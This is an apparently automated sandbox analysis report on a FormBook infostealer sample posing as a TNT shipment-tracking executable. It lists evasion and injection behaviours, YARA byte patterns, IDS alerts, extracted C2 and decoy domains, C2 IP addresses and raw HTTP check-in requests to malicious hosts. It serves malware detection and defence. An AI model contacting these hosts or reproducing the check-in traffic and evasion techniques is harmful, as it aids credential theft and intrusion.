
Windows Analysis Report
TNT AWB TRACKING DETAILS.exe

Overview

General Information

Sample name: TNT AWB TRACKING DETAILS.exe
Analysis ID: 1517909
MD5: b49edb762958e81c098b4869ba26a78c
SHA1: 152bda24aa1bd2b8f6eff91f214ebf1701062a7e
SHA256: 58892474694c1aff444adca37753e52b93fffce8bb98b75d488ec3df2c87b2da
Tags: exe, Formbook, TNT, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TNT AWB TRACKING DETAILS.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: B49EDB762958E81C098B4869BA26A78C)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wlanext.exe (PID: 7568 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 7644 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.weight-loss-003.today/jd21/"], "decoy": ["bankownedproperties-0.bond", "slab-leak-repair-74697.bond", "tvtwenty20sr.top", "scw-iot.net", "circusenergy.online", "030002787.xyz", "propertiesforrentus11.bond", "defi-banksystem.online", "gkbet168.net", "joycasino-ed46.top", "sctttc-or.top", "borghardt.xyz", "therealtorpeddler.info", "macexpress.online", "bobbyharvey.store", "dating-dd-de.info", "thetrue.one", "alqahtani.site", "mahlubini.africa", "truck-driver-jobs-42274.bond", "packaging-services-17231.xyz", "badcreditloans59.xyz", "cellphonesfxw.today", "applyzentavra.com", "basscolofers.shop", "knee-pain-treatment-140741.xyz", "saltyfashion.shop", "quantive.tech", "cldvpn.sbs", "bolehapasaja16.shop", "nextdoor3.store", "forklift-jobs-29768.bond", "pools-99305.bond", "3780.cyou", "solveiterzsolutions.fun", "key-ring.xyz", "replyingendoplasmed.pro", "infanbs.shop", "apple0ficial-ld.info", "stress-relief-44110.bond", "r86gd377hi.rent", "lww20.top", "apartments-for-rent-series.sbs", "emiratesnseic.top", "senior-living-25596.bond", "hostease.cloud", "walk-in-tubs-30303.bond", "childrenfirstcenter.xyz", "45941978.top", "pw7-golden-painting-ldm.lat", "0yf.com", "tyumk.xyz", "utopartses.com", "hearing-aids-77773.bond", "frametoryframes.shop", "mvtb.pics", "speeddeals.online", "cyber-eu.digital", "hm23s.top", "pools-80761.bond", "2002w.app", "authentication-app-69447.bond", "legendhud.shop", "xmld101.icu"]}
Source | Rule | Description | Author
00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
Strings:
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
(table truncated; 34 entries in total)
Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
Strings:
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
Strings:
  • 0x17a19:$sqlite3step: 68 34 1C 7B E1
  • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a48:$sqlite3text: 68 38 2A 90 C5
  • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
(table truncated; 15 entries in total)

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, ParentProcessId: 7420, ParentProcessName: TNT AWB TRACKING DETAILS.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 7524, ProcessName: svchost.exe
Source: Process started, Author: Tim Rauch, Data: Command: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 7568, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", ProcessId: 7644, ProcessName: cmd.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, ParentProcessId: 7420, ParentProcessName: TNT AWB TRACKING DETAILS.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 7524, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T09:07:05.147039+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 185.134.245.113 | 80 | TCP
2024-09-25T09:07:45.103010+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49711 | 188.114.96.3 | 80 | TCP
2024-09-25T09:08:26.169273+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49712 | 185.53.179.93 | 80 | TCP
2024-09-25T09:09:48.966168+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49713 | 185.53.179.92 | 80 | TCP
2024-09-25T09:10:09.459963+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49714 | 77.37.37.36 | 80 | TCP


AV Detection

Source: TNT AWB TRACKING DETAILS.exe, Avira: detected
Source: http://www.propertiesforrentus11.bond/jd21/, Avira URL Cloud: Label: phishing
Source: http://www.circusenergy.online, Avira URL Cloud: Label: malware
Source: http://www.circusenergy.online/jd21/www.cyber-eu.digital, Avira URL Cloud: Label: malware
Source: http://www.circusenergy.online/jd21/, Avira URL Cloud: Label: malware
Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.weight-loss-003.today/jd21/"], "decoy": ["bankownedproperties-0.bond", "slab-leak-repair-74697.bond", "tvtwenty20sr.top", "scw-iot.net", "circusenergy.online", "030002787.xyz", "propertiesforrentus11.bond", "defi-banksystem.online", "gkbet168.net", "joycasino-ed46.top", "sctttc-or.top", "borghardt.xyz", "therealtorpeddler.info", "macexpress.online", "bobbyharvey.store", "dating-dd-de.info", "thetrue.one", "alqahtani.site", "mahlubini.africa", "truck-driver-jobs-42274.bond", "packaging-services-17231.xyz", "badcreditloans59.xyz", "cellphonesfxw.today", "applyzentavra.com", "basscolofers.shop", "knee-pain-treatment-140741.xyz", "saltyfashion.shop", "quantive.tech", "cldvpn.sbs", "bolehapasaja16.shop", "nextdoor3.store", "forklift-jobs-29768.bond", "pools-99305.bond", "3780.cyou", "solveiterzsolutions.fun", "key-ring.xyz", "replyingendoplasmed.pro", "infanbs.shop", "apple0ficial-ld.info", "stress-relief-44110.bond", "r86gd377hi.rent", "lww20.top", "apartments-for-rent-series.sbs", "emiratesnseic.top", "senior-living-25596.bond", "hostease.cloud", "walk-in-tubs-30303.bond", "childrenfirstcenter.xyz", "45941978.top", "pw7-golden-painting-ldm.lat", "0yf.com", "tyumk.xyz", "utopartses.com", "hearing-aids-77773.bond", "frametoryframes.shop", "mvtb.pics", "speeddeals.online", "cyber-eu.digital", "hm23s.top", "pools-80761.bond", "2002w.app", "authentication-app-69447.bond", "legendhud.shop", "xmld101.icu"]}
Source: TNT AWB TRACKING DETAILS.exe, ReversingLabs: Detection: 52%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: TNT AWB TRACKING DETAILS.exe, Joe Sandbox ML: detected
Source: TNT AWB TRACKING DETAILS.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop ebx, 2_2_00407B1A
Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop ebx, 4_2_030D7B1B

Networking

Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49712 -> 185.53.179.93:80
Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49712 -> 185.53.179.93:80
Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49712 -> 185.53.179.93:80
Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49709 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49709 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49709 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49711 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49711 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49711 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49713 -> 185.53.179.92:80
Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49713 -> 185.53.179.92:80
Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49714 -> 77.37.37.36:80
Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49713 -> 185.53.179.92:80
Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49714 -> 77.37.37.36:80
Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49714 -> 77.37.37.36:80
Source: Malware configuration extractor, URLs: www.weight-loss-003.today/jd21/
          Source: DNS query: www.borghardt.xyz
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=yaFk5fMSAGN82SCLgaCn8ag2pJ39IRNZ6T5Hukk791SUyW8vAMaB+rWiLjqwV1W2V2ID HTTP/1.1 Host: www.circusenergy.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp HTTP/1.1 Host: www.weight-loss-003.today Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI HTTP/1.1 Host: www.walk-in-tubs-30303.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=b/Dc4UkLHLZk59X8SmhgJ1uv172ipMqzAxiQNMhexpG5XWQ9Iwkd+tXAg5/cR36jPrSP HTTP/1.1 Host: www.pools-80761.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix HTTP/1.1 Host: www.legendhud.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 185.53.179.92 185.53.179.92
Source: Joe Sandbox View, IP Address: 185.53.179.93 185.53.179.93
Source: Joe Sandbox View, ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View, ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: DOMENESHOPOsloNorwayNO DOMENESHOPOsloNorwayNO
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=yaFk5fMSAGN82SCLgaCn8ag2pJ39IRNZ6T5Hukk791SUyW8vAMaB+rWiLjqwV1W2V2ID HTTP/1.1 Host: www.circusenergy.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp HTTP/1.1 Host: www.weight-loss-003.today Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
